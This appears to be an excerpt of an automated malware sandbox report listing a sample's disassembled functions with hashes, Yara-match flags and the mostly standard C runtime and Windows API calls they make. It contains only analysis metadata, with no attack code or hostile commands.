                                                                                                                                                    • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                                                                                                                                                    • Instruction Fuzzy Hash: 84113D0A8492C4BDCF424A7840E56EBEFA58E2B218F5A71DA88C44B743D01B150FE7A1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02270042 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                    • Instruction ID: 8ad4daeff8530941dbe422a6b3ff25f99935847cf921b59415f91e2f4ceb1112
                                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                    • Instruction Fuzzy Hash: 2C11CE72360200AFEB04CFA5DC90FA673EAFB88330B198065ED08CB315D676E905CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0210A0A3 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229632028.000000000210A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0210A000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_210a000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                    • Instruction ID: f7feeba2a5cfdc35cd53896c4d93eac55117a6000692d92ee5d1709dcddfaddb
                                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                    • Instruction Fuzzy Hash: 691170723802049FD754DE55DCC0EA673EAEF89220B198065EE08CB356D7B5EC42C760
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227A79A Relevance: .0, Instructions: 36COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                                    • Instruction ID: 4089e17c591b7b6a782ceaf4c262e4a4405c165a29768915e6383cd41dc9f4a6
                                                                                                                                                    • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                                                                                                                                                    • Instruction Fuzzy Hash: 25012C768146629BD700DF3EC8C045AFBF1FB082217528B26DC9083A41D334E562DBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02296437 Relevance: 18.1, APIs: 12, Instructions: 84COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1442030790-0
                                                                                                                                                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                    • Instruction ID: a59de39eaf90d7ace7bc5db88e03574209fa2b93808cd543eae142027ccb4c7d
                                                                                                                                                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                    • Instruction Fuzzy Hash: 3321C335124702AFEF327FE5DC01E2B7BEAEF42760B508029E489550ACEB228560CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02293F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 02293F51
                                                                                                                                                      • Part of subcall function 02295BA8: __getptd_noexit.LIBCMT ref: 02295BA8
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 02293FEA
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 02294020
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0229403D
                                                                                                                                                    • __allrem.LIBCMT ref: 02294093
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022940AF
                                                                                                                                                    • __allrem.LIBCMT ref: 022940C6
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022940E4
                                                                                                                                                    • __allrem.LIBCMT ref: 022940FB
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02294119
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 0229418A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 384356119-0
                                                                                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction ID: d340ae704b1e6c0f343e681b6c79f2953a48b1fe9d8870688383a7fe1681e0ec
                                                                                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction Fuzzy Hash: EA71D771A20717ABDF14EEF9CC40B6AB3B9BF10364F14416AE514E6698EB70DA41CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0229650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3432600739-0
                                                                                                                                                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                    • Instruction ID: 5617a71b405ca291bb38d3ec8457b40a4ab07009f1189134bac3c09cfe375755
                                                                                                                                                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                    • Instruction Fuzzy Hash: A2413432924309AFDF00AFE4DC80BAE3BEAFF44324F10802DE91496198DB799645DF21
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022BFC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 022BFC1F
                                                                                                                                                      • Part of subcall function 022A169C: std::exception::_Copy_str.LIBCMT ref: 022A16B5
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 022BFC34
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 022BFC4D
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 022BFC62
                                                                                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 022BFC74
                                                                                                                                                      • Part of subcall function 022BF914: std::exception::exception.LIBCMT ref: 022BF92E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 022BFC82
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 022BFC9B
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 022BFCB0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                                    • String ID: leM
                                                                                                                                                    • API String ID: 3569886845-2926266777
                                                                                                                                                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                    • Instruction ID: 4682c34a2fd47a7bcb24f0c3d0c00408035d530bdb796c31c98fc79e7dbf901a
                                                                                                                                                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                    • Instruction Fuzzy Hash: 4911DA79C0030DBBCB04FFE5D865CDDBB7DAA04744F408566A92897644EB74A3588F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D9BC Relevance: 15.1, APIs: 10, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0040D9D5
                                                                                                                                                      • Part of subcall function 0040DD5B: __calloc_impl.LIBCMT ref: 0040DD6C
                                                                                                                                                      • Part of subcall function 0040DD5B: Sleep.KERNEL32(00000000,00402E6D,0040115A), ref: 0040DD83
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0040D9F9
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0040DA15
                                                                                                                                                    • __copytlocinfo_nolock.LIBCMT ref: 0040DA3A
                                                                                                                                                    • __setlocale_nolock.LIBCMT ref: 0040DA47
                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 0040DA53
                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 0040DA5A
                                                                                                                                                    • __setmbcp_nolock.LIBCMT ref: 0040DA72
                                                                                                                                                    • ___removelocaleref.LIBCMT ref: 0040DA87
                                                                                                                                                    • ___freetlocinfo.LIBCMT ref: 0040DA8E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__calloc_impl__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2969281212-0
                                                                                                                                                    • Opcode ID: 9f0c8ae64688bf50d141e572dd43cc09945fa4d7db858593709aa8e25b7465fd
                                                                                                                                                    • Instruction ID: 6327026b5742936ec33c528bf450b3bb14fba5a352f6e23686e80ff2041da3ac
                                                                                                                                                    • Opcode Fuzzy Hash: 9f0c8ae64688bf50d141e572dd43cc09945fa4d7db858593709aa8e25b7465fd
                                                                                                                                                    • Instruction Fuzzy Hash: 93210A35908600EBE7217FA6D94291BBBE5DF81714B20843FF445762E1DB3D9C09CA5C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3721157643-0
                                                                                                                                                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                    • Instruction ID: e2127b52a96edd00e6802fa3782587445e84d2c55c7a42923fc90651eda979e0
                                                                                                                                                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                    • Instruction Fuzzy Hash: 481124B29286647ACA61B3F60C11EFF3ADD9F45702F0401A9FE8CD1184EA185A149BB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02281960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 65388428-0
                                                                                                                                                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                    • Instruction ID: 28d4ad7d66c58447761a244dec9da0d93e7824510010f56cdc7d6fe9f932083d
                                                                                                                                                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                    • Instruction Fuzzy Hash: D0515C71D40209ABEB11EBE5DC85FEFBBB9FB04704F140025F909B61C4E7749A118BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 217217746-0
                                                                                                                                                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                    • Instruction ID: 71ccd468b0d5e494be341011193e3c34b9655b1d48f31d2b599001e89dbf5d01
                                                                                                                                                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                    • Instruction Fuzzy Hash: 4251ADB1D54249ABEF11DFE1DD46FEEBBB9EB04704F100029F905B6180E7B4AA058BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 217217746-0
                                                                                                                                                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                    • Instruction ID: be4c37c72a96b0c7cc37b295b3b727f4a0b3f33ad5378786e8803af6f9a913c3
                                                                                                                                                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                    • Instruction Fuzzy Hash: DC515E71D54209ABDF21DFE1DD46FEEBBB9FB08704F100129F905B6184E774AA058BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022B208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3534693527-0
                                                                                                                                                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                    • Instruction ID: a2fcdc21fdda78dfb9f8db73b1f104b9424d8603bdfe397824bea792e76c4bcd
                                                                                                                                                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                    • Instruction Fuzzy Hash: CF31C272A30326EADB237AE49C00BEE37959F15BA4F144A15ED04EB29CDB748541CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 023366D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 023366DD
                                                                                                                                                      • Part of subcall function 022959BF: __calloc_crt.LIBCMT ref: 022959E2
                                                                                                                                                      • Part of subcall function 022959BF: __initptd.LIBCMT ref: 02295A04
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 02336700
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 0233671E
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 0233673B
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 0233676D
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 0233678B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229908014.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2270000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4066021419-0
                                                                                                                                                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                    • Instruction ID: b35d3ca41dc49539113a39858599611016991c5c19715eaa8649b2e53710e9a9
                                                                                                                                                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                    • Instruction Fuzzy Hash: A211BF326117147FEB337AA5DC02BAA739DDF047A0B800426FE08A6640E7259A018EE8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040CE67 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd.LIBCMT ref: 0040CE73
                                                                                                                                                      • Part of subcall function 0040BB7E: __getptd_noexit.LIBCMT ref: 0040BB81
                                                                                                                                                      • Part of subcall function 0040BB7E: __amsg_exit.LIBCMT ref: 0040BB8E
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0040CE7E
                                                                                                                                                      • Part of subcall function 0040DD5B: __calloc_impl.LIBCMT ref: 0040DD6C
                                                                                                                                                      • Part of subcall function 0040DD5B: Sleep.KERNEL32(00000000,00402E6D,0040115A), ref: 0040DD83
                                                                                                                                                    • __lock.LIBCMT ref: 0040CEB4
                                                                                                                                                    • ___addlocaleref.LIBCMT ref: 0040CEC0
                                                                                                                                                    • __lock.LIBCMT ref: 0040CED4
                                                                                                                                                    • InterlockedIncrement.KERNEL32(?), ref: 0040CEE4
                                                                                                                                                      • Part of subcall function 00402E68: __getptd_noexit.LIBCMT ref: 00402E68
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getptd_noexit__lock$IncrementInterlockedSleep___addlocaleref__amsg_exit__calloc_crt__calloc_impl__getptd
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3538106438-0
                                                                                                                                                    • Opcode ID: f847d163da55ac125a7a548637fdd058e171f0babd78524b1fff2840fd05c948
                                                                                                                                                    • Instruction ID: 6c72d22d7df9ddc37969fb36ee1438990fff20fab03f6b554f7503283cfc5505
                                                                                                                                                    • Opcode Fuzzy Hash: f847d163da55ac125a7a548637fdd058e171f0babd78524b1fff2840fd05c948
                                                                                                                                                    • Instruction Fuzzy Hash: 7A019E71945301EBE720BFB5C88675C76A0AF44B28F20462FF454BB2C1CB7C59418BAE
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004AE346 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004AE372
                                                                                                                                                    • LCMapStringA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004AE397
                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004AE3A3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnvironmentFormatFreeStringStringsTime
                                                                                                                                                    • String ID: -$-
                                                                                                                                                    • API String ID: 4109882376-2078519666
                                                                                                                                                    • Opcode ID: d7c186b614158aa1c066c257afc6cd3c1bce9cf70a6157c255c07b7bc7e18c47
                                                                                                                                                    • Instruction ID: 4ec651055bb876c22101890441ddf58988c38113847badf45acb3fbe50ea6f48
                                                                                                                                                    • Opcode Fuzzy Hash: d7c186b614158aa1c066c257afc6cd3c1bce9cf70a6157c255c07b7bc7e18c47
                                                                                                                                                    • Instruction Fuzzy Hash: AE01FC70501114ABCB20AF2ADC8459F7FBCEF5B324B51027AE615E7151C6384982C79C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004119CA Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileType.KERNEL32(?,?,?,004B7740,0000000C), ref: 004119FE
                                                                                                                                                    • GetLastError.KERNEL32(?,?,004B7740,0000000C), ref: 00411A08
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00411A0F
                                                                                                                                                    • __alloc_osfhnd.LIBCMT ref: 00411A30
                                                                                                                                                    • __set_osfhnd.LIBCMT ref: 00411A5A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1229333280.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1229321403.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229382657.00000000004B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229396938.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229409475.00000000004BA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229419662.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1229430790.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
